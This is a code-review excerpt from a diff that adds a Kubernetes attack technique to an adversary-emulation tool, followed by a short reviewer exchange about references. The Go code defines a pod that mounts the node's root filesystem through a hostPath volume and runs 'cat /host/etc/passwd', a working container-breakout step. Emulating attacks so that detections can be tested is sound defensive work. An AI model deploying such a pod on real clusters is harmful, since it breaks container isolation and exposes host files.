internal/attacktechniques/k8s/privilege-escalation/hostpath-volume/main.go

```diff
@@ -0,0 +1,107 @@
+package kubernetes
+
+import (
+	"context"
+	"log"
+
+	_ "embed"
+
+	"github.com/datadog/stratus-red-team/internal/providers"
+	"github.com/datadog/stratus-red-team/pkg/stratus"
+	"github.com/datadog/stratus-red-team/pkg/stratus/mitreattack"
+	v1 "k8s.io/api/core/v1"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+)
+
+//go:embed main.tf
+var tf []byte
+
+var nodeRootPodSpec = v1.Pod{
+	ObjectMeta: metav1.ObjectMeta{
+		Name:      "k8s.privilege-escalation.hostpath-volume",
+		Namespace: providers.StratusK8sNamespace,
+	},
+	Spec: v1.PodSpec{
+		Containers: []v1.Container{
+			{
+				Name:  "busybox",
+				Image: "busybox:stable",
+				Command: []string{
+					"cat",
+				},
+				Args: []string{
+					"/host/etc/passwd",
+				},
+
+				VolumeMounts: []v1.VolumeMount{
+					{
+						Name:      "hostfs",
+						MountPath: "/host",
+					},
+				},
+			},
+		},
+		Volumes: []v1.Volume{
+			{
+				Name: "hostfs",
+				VolumeSource: v1.VolumeSource{
+					HostPath: &v1.HostPathVolumeSource{
+						Path: "/",
+					},
+				},
+			},
+		},
+	},
+}
+
+func init() {
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:                 "k8s.privilege-escalation.hostpath-volume",
+		FriendlyName:       "Container breakout via hostPath volume mount",
+		Platform:           stratus.Kubernetes,
+		IsIdempotent:       true,
+		MitreAttackTactics: []mitreattack.Tactic{mitreattack.PrivilegeEscalation},
+		Description: `
+Creates a Pod with the entire node root filesystem as a hostPath volume mount
+
```

Comment:
One thing I realized might be helpful is references.  Some good ones:

```suggestion
References:
- https://www.youtube.com/watch?v=gtaaONq-XGY
- https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/

```

Reply:
added. Leaving out K8s threat matrix as it seems not specific to this TTP